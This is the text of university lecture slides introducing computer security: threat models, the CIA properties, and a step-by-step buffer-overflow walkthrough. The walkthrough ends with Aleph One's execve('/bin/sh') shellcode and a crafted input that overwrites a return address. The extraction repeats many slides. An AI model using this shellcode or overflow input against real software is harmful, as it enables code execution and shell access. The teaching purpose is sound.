day 1-1-intro-sw-vuls
TRANSCRIPT
Dawn Song 1
Introduction
Computer Security Course. Dawn Song
Dawn Song 2
Intro to Instructor
Aug, 2012
Summer school
Jul, 2007
Prof., UC Berkeley
Sep, 2002
PhD, UC BerkeleyProf., CMU
Born in Dalian, ChinaClose to Korea
http://www.cs.berkeley.edu/[email protected]
Dawn Song 3
Research Interests & Projects
• Computer security & privacy
• BitBlaze: Binary analysis for computer security
• WebBlaze: New technologies to enhance web security
• DroidBlaze: Android security analysis infrastructure
• Machine learning & security
• Platform for private data
Dawn Song 4
DissectingMalware
BitBlaze Binary Analysis Infrastructure
DetectingVulnerabilities
GeneratingFilters
BitBlaze: Computer Security via Program Binary Analysis
Unified platform to accurately analyze security properties of binaries
Security evaluation & audit of third-party code
Defense against morphing threats
Faster & deeper analysis of malware
Dawn Song 5
WebBlaze: New Security Technologies for the Web
• Does the browser correctly enforce desired security policy?– Cross-origin capability leaks: attacks & defense [USENIX 09]
• Is third-party content such as malicious ads securely sandboxed?– Preventing Capability Leaks in Secure JavaScript Subsets [NDSS10]
• Do browsers & servers have consistent interpretations/views to enforce security properties?– Document Structure Integrity: A Robust Basis for Cross-site Scripting Defense [NDSS09]– Content sniffing XSS: attacks & defense [IEEE S&P 09]
• Do applications have security vulnerabilities?– Symbolic Execution Framework for JavaScript [IEEE S&P10]
• Do different web protocols interact securely?– Model checking web protocols [CSF 10]
• How to build secure web applications by construction?– Context-sensitive auto-sanitization in web applications [CCS 11]
• How to reduce TCB in web applications?– Privilege Separation in HTML5 Applications [USENIX Security 12]
Dawn Song 6
Apps
StaticAnalysis
App Runner VM
Behavior Analysis
DroidBlaze
AnalyzedApps
StaticAnalyzer
AppRewriter
DynamicAnalysis
ExecutionExploration
BehaviorAnalyzer
PropertyChecker
Rewritten App
ExecutionData
bitblaze.cs.berkeley.edu
webblaze.cs.berkeley.edu
droidblaze.cs.berkeley.edu
Dawn Song 8
Intro of Students
• Name• Institution• Areas of interest
– Systems? Programming languages? AI? Theory?• Background in computer security
– Have you taken a computer security class? – Have you done research in computer security?
• Find partners for labs
Dawn Song 9
Overview of Lectures
• Syllabus
• Labs: hands-on experience
• TAs– Dylan– Taebum
Dawn Song 10
Overview of LecturesDate/Time Topic Notes
Part 1: Software Security
Mon Aug 20(09:00-12:00)
Software Security (I.1): Vulnerabilities, Attacks & Defenses. Different classes of vulnerabilities and attacks. Runtime defenses.
(13:00-18:00) Software Security (I.2): Deeper look at vulnerabilities and attacks (Lab Session)
Tues Aug 21(09:00-12:00)
Software Security (II.1): Automatic vulnerability discovery. Static Analysis. Dynamic Analysis. Symbolic Execution
(13:00-18:00) Software Security (II.2): Tools for software security analysis and vulnerability discovery (Lab Session)
Part 2: Web Security
Wed Aug 22(09:00-12:00)
Web Security (I.1): Vulnerabilities & attacks. Overview of web security. Different classes of web vulnerabilities and attacks
(13:00-18:00) Web Security (I.2): Vulnerabilities & attacks. Deeper look at web vulnerabilities & attacks (Lab Session)
Thurs Aug 23(09:00-12:00)
Web Security (II.1): Automatic vulnerability discovery & defense. Automatic analysis techniques and tools to detect web vulnerabilities. New security primitives and mechanisms for defenses
(13:00-18:00) Web Security (II.2): Automatic vulnerability discovery & defense. Deeper look at web defenses
(Lab Session)
Part 3: Malware and Mobile Security
Fri Aug 24(09:00-12:00)
Malware and Mobile Security (1): Overview of malware. Worms and botnets. Overview of mobile security. Different classes of vulnerabilities & attacks. State-of-the-art defenses
(13:00-18:00) Malware and Mobile Security (2): Deeper look at mobile vulnerabilities & attacks (Lab Session)
Dawn Song 11
Introduction to Computer Security:Goals & Threat Models
Computer Security Course. Dawn Song
Dawn Song 12
What is Computer Security About?
• General goals:– Allow intended use of computer systems– Prevent unintended use that may cause harm
• Examples:– Only share your photos & location with friends– Don’t want attackers install key-logger on your
machine to steal your password
Dawn Song 13
Why Should You Care?
• It impacts your day-to-day life
Dawn Song 14
Why Should You Care?
• It impacts everybody’s day-to-day life– Millions of computers compromised– Millions of passwords stolen
Dawn Song 15
What is Computer Security About?
• General goals:– Allow intended use of computer systems– Prevent unintended use that may cause harm
• More precisely…
Dawn Song 16
Basic Security Properties: CIA
• Confidentiality• Integrity• Availability
Dawn Song 17
Basic Security Properties (I)
• Confidentiality: – Information is only disclosed to authorized people or
systems– E.g., attackers cannot learn your banking info
Dawn Song 18
Basic Security Properties (II)
• Integrity:– Information cannot be tampered with in an
unauthorized way – E.g., attacker cannot change the balance of your bank
account
Dawn Song 19
Basic Security Properties (III)
• Availability:– Information and services are accessible in a timely
fashion to authorized people or systems– E.g., you should be able to login and perform
transactions on your online banking account when you want to
Dawn Song 20
Basic Security Properties: CIA
• Confidentiality• Integrity• Availability
Dawn Song 21
Security Analysis
• Given a computer system, one may ask:
Is the computer system secure?
Dawn Song 22
Is the House Secure?
Dawn Song 23
It Depends …
• What are the assets? What are the goals?
Dawn Song 24
It Depends …
• Threat model– In SafeLand, you don’t need to lock the door– Attackers who pick locks– Attackers who drive a bull-dozer– Attackers who have super advanced technology– Attackers who may know you well
Dawn Song 25
Is the House Secure?
• Is the house’s protection mechanism strong enough to protect the assets from attackers in a certain threat model?
Dawn Song 26
Which Threat Model Should You Choose?
?
Dawn Song 27
Cost of Security
• Should you always build & evaluate a system secure against the strongest attacker?– A student may simply not be able to afford an alarm
system• Not about perfect security
Perfect SecurityRisk Analysis
Dawn Song 28
Is the Computer System Secure?
• Is the system’s protection mechanism strong enough to protect the assets & achieve security goals against attackers in a certain threat model?
Dawn Song 29
Key Elements to Security AnalysisSecurity properties
Threat Model
?SecurityAnalysis
Dawn Song 30
Threat Model• Assumptions on attackers’ abilities and resources
0Day
DDoS
Network Eavesdropper
MITM Attack
DES Cracker
Dawn Song 31
Which Threat Models to Choose?
• For the grade database system for your class?• For your phone? • For a major online banking site?• For the system to control nuclear weapon launch?
Dawn Song 32
Cost of Security
• There’s no free lunch.• There’s no free security.• Cost of security
– Expensive to develop– Performance overhead– Inconvenience to users
Dawn Song 33
Prioritize Your Security Solution according to Your Threat Model
• No one wants to pay more for security than what they have to lose
• Not about perfect security– Risk analysis Perfect SecurityRisk Analysis
Dawn Song 34
Changing Threat Model
• Be careful when your threat model changes– E.g., online account
New account, nothing of value; No incentive for attackers
Over time….
Account accumulates value; More incentive for attackers
Dawn Song 35
Design Impacts Cost of Security
• Good system design & architecture can reduce cost of security
Dawn Song 36
Design Impacts Cost of Security
Browser
Known unpatched vulnerabilities
Secunia SecurityFocus
Extremely critical(number / oldest)
Highly critical(number / oldest)
Moderately critical(number / oldest)
Less critical(number / oldest)
Not critical(number / oldest)
Total(number / oldest)
Google Chrome 16 0 0 0 0 0 113 December 2011
Internet Explorer 6 0 0 417 November 2004
827 February 2004
125 June 2003
53420 November 2000
Internet Explorer 7 0 0 130 October 2006
46 June 2006
95 June 2003
21315 August 2006
Internet Explorer 8 0 0 0 126 February 2007
75 June 2003
12314 January 2009
Internet Explorer 9 0 0 0 0 16 December 2011
265 March 2011
Firefox 3.6 0 0 0 0 0 120 December 2011
Firefox 9 0 0 0 0 0 0
Opera 11 0 0 0 0 16 December 2011
26 December 2011
Safari 5 0 0 0 18 June 2010 0 2
13 December 2011
"Vulnerabilities." SecurityFocus. Web. 18 Jan. 2012. <http://www.securityfocus.com/>."Advisories." Secunia. Web. 18 Jan. 2012. <https://secunia.com/community/advisories/>.
Dawn Song 37
Break
Dawn Song 38
Software Security (I): Buffer-overflow Attacks
Computer Security Course. Dawn Song
Dawn Song 39
Intro
SERVER
CLIENT
HTTP REQUEST
HTTP RESPONSE
EXPLOIT
Remote Shell
CLIENT ATTACKER
Linux (32-bit) process memory layout
Reserved for Kernal
user stack
shared libraries
run time heap
static data segment
text segment (program)
unused
-0xC0000000
-0x40000000
-0x08048000
%esp
brk
Loaded from exec
-0x00000000
-0xFFFFFFFF
Stack Frame
user stack
shared libraries
run time heap
static data segment
text segment (program)
unused
-0xC0000000
-0x40000000
-0x08048000
-0x00000000
arguments
return address
stack frame pointer
exception handlers
local variables
callee saved registers
To previous stack frame pointer
To the point at which this function was called
Stack Frame
9:int parse(FILE *fp) {10: char buf[5], *url, cmd[128];11: fread(cmd, 1, 128, fp);12: int header_ok = 0;13: if (cmd[0] == ‘G’)14: if (cmd[1] == ‘E’)15: if (cmd[2] == ‘T’)16: if (cmd[3] == ‘ ’)17: header_ok = 1;18: if (!header_ok) return -1;19: url = cmd + 4;20: copy_lower(url, buf);21: printf(“Location is %s\n”, buf);22: return 0; }
1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: buf[i] = ‘\0’; 8:}
A quick example to illustrate multiple stack frames
Viewing Stack Frame with GDB
9:int parse(FILE *fp) {10: char buf[5], *url, cmd[128];11: fread(cmd, 1, 128, fp);12: int header_ok = 0;13: if (cmd[0] == ‘G’)14: if (cmd[1] == ‘E’)15: if (cmd[2] == ‘T’)16: if (cmd[3] == ‘ ’)17: header_ok = 1;18: if (!header_ok) return -1;19: url = cmd + 4;20: copy_lower(url, buf);21: printf(“Location is %s\n”, buf);22: return 0; }
1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: buf[i] = ‘\0’; 8:}
gcc –g parse.c –o parseCompile:
./parseRun:
We can debug using gdb.gdb parse
Then we can take a look at the stack.(gdb) break 7(gdb) run(gdb) x/64x $esp
Debug:
23: /** main to load a file and run parse */
Our example modified to include a main function
parse.c
Viewing Stack Frame with GDB
(gdb) x/64x $espDebug:
Our running example modified to illustrate multiple stack frames
parse.c
What are buffer overflows?
args
ret address
frame ptr
local variables
callee saved registers
(Unallocated)
9:int parse(FILE *fp) {10: char buf[5], *url, cmd[128];11: fread(cmd, 1, 256, fp);12: int header_ok = 0;...19: url = cmd + 4;20: copy_lower(url, buf);21: printf(“Location is %s\n”, buf);22: return 0; }
1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: buf[i] = ‘\0’; 8:}
23: /** main to load a file and run parse */
parse.c
BREAK
file
GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(input file)
BREAK
BREAK
args
ret address
frame ptr
local variables
callee saved registers
fpreturn address
stack frame ptr
urlheader_ok buf[4]buf[3,2,1,0]cmd[128,127,126,125]...cmd[7,6,5,4]cmd[3,2,1,0]urlheader_ok
0xbffff75c
0xbffff758
0xbffff74c0xbffff7480xbffff7440xbffff7400xbffff73c
.
.
.0xbffff6c40xbffff6c00xbffff74c0xbffff748
0x0804a008
0x080485a2
0xbffff778
0xbffff6c40x000000010xbfef20dc0xbf02224c0x00000000
...0x414141410x205445470xbffff6c40x00000001
0xbffff760
in
return address
stack frame ptr
i
0xbffff740
0xbffff6c4
0x080485a2
0xbffff758
0x00000000
out0xbffff6b4
0xbffff6b0
0xbffff6ac
0xbffff6a8
0xbffff69c
copy_lower’sframe
parse’sframe
What are buffer overflows?
fpreturn address
stack frame ptr
urlheader_ok buf[4]buf[3,2,1,0]cmd[128,127,126,125]...cmd[7,6,5,4]cmd[3,2,1,0]urlheader_ok
0xbffff75c
0xbffff758
0xbffff74c0xbffff7480xbffff7440xbffff7400xbffff73c
.
.
.0xbffff6c40xbffff6c00xbffff74c0xbffff748
in
return address
stack frame ptr
i
0x0804a008
0x080485a2
0xbffff778
0xbffff6c40x000000010xbfef20dc0xbf0222610x00000000
...0x414141410x205445470xbffff6c40x00000001
(Unallocated)
0xbffff740
0xbffff6c4
0x080485a2
0xbffff758
0x00000000
out0xbffff6b4
0xbffff6b0
0xbffff6ac
0xbffff6a8
0xbffff69c
9:int parse(FILE *fp) {10: char buf[5], *url, cmd[128];11: fread(cmd, 1, 256, fp);12: int header_ok = 0;...19: url = cmd + 4;20: copy_lower(url, buf);21: printf(“Location is %s\n”, buf);22: return 0; }
1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: buf[i] = ‘\0’; 8:}
23: /** main to load a file and run parse */
parse.c
BREAK 0xbffff760
file
GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(input file)
What are buffer overflows?
fpreturn address
stack frame ptr
urlheader_ok buf[4]buf[3,2,1,0]cmd[128,127,126,125]...cmd[7,6,5,4]cmd[3,2,1,0]urlheader_ok
0xbffff75c
0xbffff758
0xbffff74c0xbffff7480xbffff7440xbffff7400xbffff73c
.
.
.0xbffff6c40xbffff6c00xbffff74c0xbffff748
in
return address
stack frame ptr
i
0x0804a008
0x080485a2
0xbffff778
0xbffff6c40x000000010xbfef20dc0xbf0261610x00000000
...0x414141410x205445470xbffff6c40x00000001
(Unallocated)
0xbffff740
0xbffff6c4
0x080485a2
0xbffff758
0x00000001
out0xbffff6b4
0xbffff6b0
0xbffff6ac
0xbffff6a8
0xbffff69c
9:int parse(FILE *fp) {10: char buf[5], *url, cmd[128];11: fread(cmd, 1, 256, fp);12: int header_ok = 0;...19: url = cmd + 4;20: copy_lower(url, buf);21: printf(“Location is %s\n”, buf);22: return 0; }
1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: buf[i] = ‘\0’; 8:}
23: /** main to load a file and run parse */
parse.c
BREAK 0xbffff760
file
GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(input file)
What are buffer overflows?
fpreturn address
stack frame ptr
urlheader_ok buf[4]buf[3,2,1,0]cmd[128,127,126,125]...cmd[7,6,5,4]cmd[3,2,1,0]urlheader_ok
0xbffff75c
0xbffff758
0xbffff74c0xbffff7480xbffff7440xbffff7400xbffff73c
.
.
.0xbffff6c40xbffff6c00xbffff74c0xbffff748
in
return address
stack frame ptr
i
0x0804a008
0x080485a2
0xbffff778
0xbffff6c40x000000010xbfef20dc0xbf6161610x00000000
...0x414141410x205445470xbffff6c40x00000001
(Unallocated)
0xbffff740
0xbffff6c4
0x080485a2
0xbffff758
0x00000002
out0xbffff6b4
0xbffff6b0
0xbffff6ac
0xbffff6a8
0xbffff69c
9:int parse(FILE *fp) {10: char buf[5], *url, cmd[128];11: fread(cmd, 1, 256, fp);12: int header_ok = 0;...19: url = cmd + 4;20: copy_lower(url, buf);21: printf(“Location is %s\n”, buf);22: return 0; }
1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: buf[i] = ‘\0’; 8:}
23: /** main to load a file and run parse */
parse.c
BREAK 0xbffff760
file
GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(input file)
What are buffer overflows?
fpreturn address
stack frame ptr
urlheader_ok buf[4]buf[3,2,1,0]cmd[128,127,126,125]...cmd[7,6,5,4]cmd[3,2,1,0]urlheader_ok
0xbffff75c
0xbffff758
0xbffff74c0xbffff7480xbffff7440xbffff7400xbffff73c
.
.
.0xbffff6c40xbffff6c00xbffff74c0xbffff748
in
return address
stack frame ptr
i
0x0804a008
0x080485a2
0xbffff778
0xbffff6c40x000000010xbfef20dc0x616161610x00000000
...0x414141410x205445470xbffff6c40x00000001
(Unallocated)
0xbffff740
0xbffff6c4
0x080485a2
0xbffff758
0x00000003
out0xbffff6b4
0xbffff6b0
0xbffff6ac
0xbffff6a8
0xbffff69c
9:int parse(FILE *fp) {10: char buf[5], *url, cmd[128];11: fread(cmd, 1, 256, fp);12: int header_ok = 0;...19: url = cmd + 4;20: copy_lower(url, buf);21: printf(“Location is %s\n”, buf);22: return 0; }
1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: buf[i] = ‘\0’; 8:}
23: /** main to load a file and run parse */
parse.c
BREAK 0xbffff760
file
GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(input file)
What are buffer overflows?
fpreturn address
stack frame ptr
urlheader_ok buf[4]buf[3,2,1,0]cmd[128,127,126,125]...cmd[7,6,5,4]cmd[3,2,1,0]urlheader_ok
0xbffff75c
0xbffff758
0xbffff74c0xbffff7480xbffff7440xbffff7400xbffff73c
.
.
.0xbffff6c40xbffff6c00xbffff74c0xbffff748
in
return address
stack frame ptr
i
0x0804a008
0x080485a2
0xbffff778
0xbffff6c40x000000010xbfef20610x616161610x00000000
...0x414141410x205445470xbffff6c40x00000001
(Unallocated)
0xbffff740
0xbffff6c4
0x080485a2
0xbffff758
0x00000004
out0xbffff6b4
0xbffff6b0
0xbffff6ac
0xbffff6a8
0xbffff69c
9:int parse(FILE *fp) {10: char buf[5], *url, cmd[128];11: fread(cmd, 1, 256, fp);12: int header_ok = 0;...19: url = cmd + 4;20: copy_lower(url, buf);21: printf(“Location is %s\n”, buf);22: return 0; }
1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: buf[i] = ‘\0’; 8:}
23: /** main to load a file and run parse */
parse.c
BREAK 0xbffff760
file
GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(input file)
What are buffer overflows?
fpreturn address
stack frame ptr
urlheader_ok buf[4]buf[3,2,1,0]cmd[128,127,126,125]...cmd[7,6,5,4]cmd[3,2,1,0]urlheader_ok
0xbffff75c
0xbffff758
0xbffff74c0xbffff7480xbffff7440xbffff7400xbffff73c
.
.
.0xbffff6c40xbffff6c00xbffff74c0xbffff748
in
return address
stack frame ptr
i
0x0804a008
0x080485a2
0xbffff778
0xbffff6c40x000000010xbfef61610x616161610x00000000
...0x414141410x205445470xbffff6c40x00000001
(Unallocated)
0xbffff740
0xbffff6c4
0x080485a2
0xbffff758
0x00000005
out0xbffff6b4
0xbffff6b0
0xbffff6ac
0xbffff6a8
0xbffff69c
9:int parse(FILE *fp) {10: char buf[5], *url, cmd[128];11: fread(cmd, 1, 256, fp);12: int header_ok = 0;...19: url = cmd + 4;20: copy_lower(url, buf);21: printf(“Location is %s\n”, buf);22: return 0; }
1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: buf[i] = ‘\0’; 8:}
23: /** main to load a file and run parse */
parse.c
BREAK 0xbffff760
file
GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(input file)
Uh oh….
What are buffer overflows?
fpreturn address
stack frame ptr
urlheader_ok buf[4]buf[3,2,1,0]cmd[128,127,126,125]...cmd[7,6,5,4]cmd[3,2,1,0]urlheader_ok
0xbffff75c
0xbffff758
0xbffff74c0xbffff7480xbffff7440xbffff7400xbffff73c
.
.
.0xbffff6c40xbffff6c00xbffff74c0xbffff748
in
return address
stack frame ptr
i
0x0804a008
0x080485a2
0xbffff778
0xbffff6c40x000000010xbf6161610x616161610x00000000
...0x414141410x205445470xbffff6c40x00000001
(Unallocated)
0xbffff740
0xbffff6c4
0x080485a2
0xbffff758
0x00000005
out0xbffff6b4
0xbffff6b0
0xbffff6ac
0xbffff6a8
0xbffff69c
9:int parse(FILE *fp) {10: char buf[5], *url, cmd[128];11: fread(cmd, 1, 256, fp);12: int header_ok = 0;...19: url = cmd + 4;20: copy_lower(url, buf);21: printf(“Location is %s\n”, buf);22: return 0; }
1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: buf[i] = ‘\0’; 8:}
23: /** main to load a file and run parse */
parse.c
BREAK 0xbffff760
file
GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(input file)
Uh oh….
What are buffer overflows?
fpreturn address
stack frame ptr
urlheader_ok buf[4]buf[3,2,1,0]cmd[128,127,126,125]...cmd[7,6,5,4]cmd[3,2,1,0]urlheader_ok
0xbffff75c
0xbffff758
0xbffff74c0xbffff7480xbffff7440xbffff7400xbffff73c
.
.
.0xbffff6c40xbffff6c00xbffff74c0xbffff748
in
return address
stack frame ptr
i
0x0804a008
0x080485a2
0xbffff778
0x616161610x616161610x616161610x616161610x00000000
...0x414141410x205445470xbffff6c40x00000001
(Unallocated)
0xbffff740
0xbffff6c4
0x080485a2
0xbffff758
0x0000000d
out0xbffff6b4
0xbffff6b0
0xbffff6ac
0xbffff6a8
0xbffff69c
parse.c
0xbffff760
file
GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(input file)
Uh oh….
9:int parse(FILE *fp) {10: char buf[5], *url, cmd[128];11: fread(cmd, 1, 256, fp);12: int header_ok = 0;...19: url = cmd + 4;20: copy_lower(url, buf);21: printf(“Location is %s\n”, buf);22: return 0; }
1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: buf[i] = ‘\0’; 8:}
23: /** main to load a file and run parse */
BREAK
What are buffer overflows?
fpreturn address
stack frame ptr
urlheader_ok buf[4]buf[3,2,1,0]cmd[128,127,126,125]...cmd[7,6,5,4]cmd[3,2,1,0]urlheader_ok
0xbffff75c
0xbffff758
0xbffff74c0xbffff7480xbffff7440xbffff7400xbffff73c
.
.
.0xbffff6c40xbffff6c00xbffff74c0xbffff748
in
return address
stack frame ptr
i
0x61616161
0x61616161
0x61616161
0x616161610x616161610x616161610x616161610x00000000
...0x414141410x205445470xbffff6c40x00000001
(Unallocated)
0xbffff740
0xbffff6c4
0x080485a2
0xbffff758
0x00000019
out0xbffff6b4
0xbffff6b0
0xbffff6ac
0xbffff6a8
0xbffff69c
parse.c
0xbffff760
file
GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(input file)
Uh oh….
9:int parse(FILE *fp) {10: char buf[5], *url, cmd[128];11: fread(cmd, 1, 256, fp);12: int header_ok = 0;...19: url = cmd + 4;20: copy_lower(url, buf);21: printf(“Location is %s\n”, buf);22: return 0; }
1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: buf[i] = ‘\0’; 8:}
23: /** main to load a file and run parse */
BREAK
What are buffer overflows?
fpreturn address
stack frame ptr
urlheader_ok buf[4]buf[3,2,1,0]cmd[128,127,126,125]...cmd[7,6,5,4]cmd[3,2,1,0]urlheader_ok
0xbffff75c
0xbffff758
0xbffff74c0xbffff7480xbffff7440xbffff7400xbffff73c
.
.
.0xbffff6c40xbffff6c00xbffff74c0xbffff748
in
return address
stack frame ptr
i
0x616161610x616161610x61616161
0x61616161
0x61616161
0x61616161
0x616161610x616161610x616161610x616161610x00000000
...0x414141410x205445470xbffff6c40x00000001
(Unallocated)
0xbffff740
0xbffff6c4
0x080485a2
0xbffff758
0x00000025
out0xbffff6b4
0xbffff6b0
0xbffff6ac
0xbffff6a8
0xbffff69c
parse.c
0xbffff760
file
GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(input file)
Uh oh….
9:int parse(FILE *fp) {10: char buf[5], *url, cmd[128];11: fread(cmd, 1, 256, fp);12: int header_ok = 0;...19: url = cmd + 4;20: copy_lower(url, buf);21: printf(“Location is %s\n”, buf);22: return 0; }
1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: buf[i] = ‘\0’; 8:}
23: /** main to load a file and run parse */
BREAK
What are buffer overflows?
fpreturn address
stack frame ptr
urlheader_ok buf[4]buf[3,2,1,0]cmd[128,127,126,125]...cmd[7,6,5,4]cmd[3,2,1,0]urlheader_ok
0xbffff75c
0xbffff758
0xbffff74c0xbffff7480xbffff7440xbffff7400xbffff73c
.
.
.0xbffff6c40xbffff6c00xbffff74c0xbffff748
in
return address
stack frame ptr
i
0x616161610x616161610x61616161
0x61616161
0x61616161
0x61616161
0x616161610x616161610x616161610x616161610x00000000
...0x414141410x205445470xbffff6c40x00000001
(Unallocated)
0xbffff740
0xbffff6c4
0x080485a2
0xbffff758
0x00000025
out0xbffff6b4
0xbffff6b0
0xbffff6ac
0xbffff6a8
0xbffff69c
9:int parse(FILE *fp) {10: char buf[5], *url, cmd[128];11: fread(cmd, 1, 256, fp);12: int header_ok = 0;...19: url = cmd + 4;20: copy_lower(url, buf);21: printf(“Location is %s\n”, buf);22: return 0; }
1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: buf[i] = ‘\0’; 8:}
23: /** main to load a file and run parse */
parse.c
BREAK
0xbffff760
file
GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(input file)
And when you try to return from parse…… SEGFAULT, since 0x61616161 is not a valid location to return to.
Dawn Song 57
Basic Stack Exploit
• Overwriting the return address allows an attacker to redirect the flow of program control
• Instead of crashing, this can allow arbitrary code to be executed – Code segment called “shellcode”
• Example: the execve system call is used to execute a file– With the correct permissions, execve(“/bin/sh”) can be used to
obtain a root-level shell.
Dawn Song 58
Shellcode of execve
• How to develop shellcode that runs as execve(“/bin/sh”)?
void main() { char *name[2];
name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
0x80002bc <__execve>: pushl %ebp0x80002bd <__execve+1>: movl %esp,%ebp0x80002bf <__execve+3>: pushl %ebx
The procedure prelude.
0x80002c0 <__execve+4>: movl $0xb,%eaxCopy 0xb (11 decimal) onto the stack. This is
the index into the syscall table. 11 is execve.
0x80002c5 <__execve+9>: movl 0x8(%ebp),%ebxCopy the address of "/bin/sh" into EBX.
0x80002c8 <__execve+12>: movl 0xc(%ebp),%ecxCopy the address of name[] into ECX.
0x80002cb <__execve+15>: movl 0x10(%ebp),%edxCopy the address of the null pointer into
%edx.
0x80002ce <__execve+18>: int $0x80Change into kernel mode.
(disassembly of execve call)*
(format instructions and data as characters)*
*For more details, refer to Smashing the stack by aleph one
“\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh”
arguments
return address
stack frame pointer
buffer
ShellCode
crafted return address
buffer
Basic Stack Exploit
To previous stack frame pointer
To the instruction at which this function was called
“\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh”
So suppose we overflow with a string that looks like the assembly of:Shell Code:exec(“/bin/sh”)
(exact shell code by Aleph One)When the function exits, the user gets shell !!!Note: shellcode runs in stack.
arguments
return address
stack frame pointer
buffer
To previous stack frame pointer
To the instruction at which this function was called
0xbffff740
0xbffff6c4
0x080485a2
0xbffff758
0x00000019
Basic Stack Exploit
fpreturn address
stack frame ptr
urlheader_ok buf[4]buf[3,2,1,0]cmd[128,127,126,125]..cmd[25,26,27,28]..cmd[7,6,5,4]cmd[3,2,1,0]urlheader_ok
0xbffff75c
0xbffff758
0xbffff74c0xbffff7480xbffff7440xbffff7400xbffff73c
.
.0xbffff7d8
.
.0xbffff6c40xbffff6c00xbffff74c0xbffff748
in
return address
stack frame ptr
i
0x0804a008
0x080485a2
0x61616161
0x616161610x616161610x616161610x616161610x00000000
.
.0xfffff764
.
.0x414141410x205445470xbffff6c40x00000001
(Unallocated)
out0xbffff6b4
0xbffff6b0
0xbffff6ac
0xbffff6a8
0xbffff69c
9:int parse(FILE *fp) {10: char buf[5], *url, cmd[128];11: fread(cmd, 1, 256, fp);12: int header_ok = 0;...19: url = cmd + 4;20: copy_lower(url, buf);21: printf(“Location is %s\n”, buf);22: return 0; }
1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: buf[i] = ‘\0’; 8:}
23: /** main to load a file and run parse */
parse.c
BREAK 0xbffff760
fileGET AAAAAAAAAAAAAAAAAAAAAAAA\x64\xf7\xff\xffAAAA\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh
(input file)
Basic Stack Exploit
fileGET AAAAAAAAAAAAAAAAAAAAAAAA\x64\xf7\xff\xffAAAA\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh
(input file)0xbffff740
0xbffff6c4
0x080485a2
0xbffff758
0x00000019
fpreturn address
stack frame ptr
